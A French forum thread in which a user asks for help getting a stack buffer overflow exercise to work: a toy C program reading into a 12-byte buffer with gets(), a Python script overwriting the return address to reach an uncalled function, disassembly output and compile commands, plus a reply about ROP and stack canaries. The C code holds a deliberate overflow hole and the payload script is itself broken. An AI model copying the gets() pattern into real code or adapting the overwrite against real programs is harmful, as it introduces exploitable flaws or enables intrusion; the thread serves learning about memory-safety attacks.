Bonjour,

Je voudrais faire du buffer overflow sur ce fichier

#include <stdio.h>
#include <unistd.h>
void lire() {
char buffer[12];
puts("Ecrivez une chaine?");
gets(buffer);
}
//Cette fonction vulnerable n’est pas appelé dans le corps du programme.
void vulnerable () { printf("Vulnerable réussie !! !! !! !!\n"); }
int main() {
lire();
puts("Message bien recu.");
return(0);
}

J'utilise ce python que j'ai fait

#!/usr/bin/python

import struct
import os



buf_size = 12

ebp = "AAAA"

addr = 0x08048403

payload = '\x90'*buf_size + ebp + struct.pack('<L', addr)+
'\x0A'

printf(payload)

J'ai recuperer addr en lancant disassemble sur la fonction vulnerable

0x08048403 <vulnerable+0>: push  %ebp
0x08048404 <vulnerable+1>: mov %esp,%ebp
0x08048406 <vulnerable+3>: sub $0x8,%esp
0x08048409 <vulnerable+6>: movl $0x804852c,(%esp)
0x08048410 <vulnerable+13>:       call   0x8048320 <put@plt>
0x08048415 <vulnerable+18>:       leave
0x08048416 <vulnerable+19>:       ret  

Quand je lance cette commande

python payload.py; ./test
!!!!!!!!!!!!!AAAAF@a
Ecrivez une chaine?

Moi, je veux qu'il envoie le print de la focntion vulnerable. Je ne sais pas ce qui manque.Pouvez-vous m'aidez svp?

-
Edité par SarahKay 16 mai 2019 à 9:48:25

Ton programme est du simple ROP.

Cependant il manque plein d'informations, dont la plus importante, comment est compilé ce programme. Dans les versions """"récentes"""" de gcc par exemple, tu vas avoir bien plus de mal à exploiter ce binaire, à cause des canaries.

Si tu veux un exemple similaire au tien, GeO a écrit un excellent article en francais à ce sujet:

https://zestedesavoir.com/articles/1424/decouvrez-lattaque-return-oriented-programming/

Voici comment je l'ai compilé:

$gcc –g –Wall test.c
$gcc –g –Wall –static –S test.c
$more vulnerable.s
$gcc –g –Wall test.c –o test

Est-ce que je dois changer quelque chose dans la compilation pour que ca fasse ce que je veux?

-
Edité par SarahKay 16 mai 2019 à 9:48:06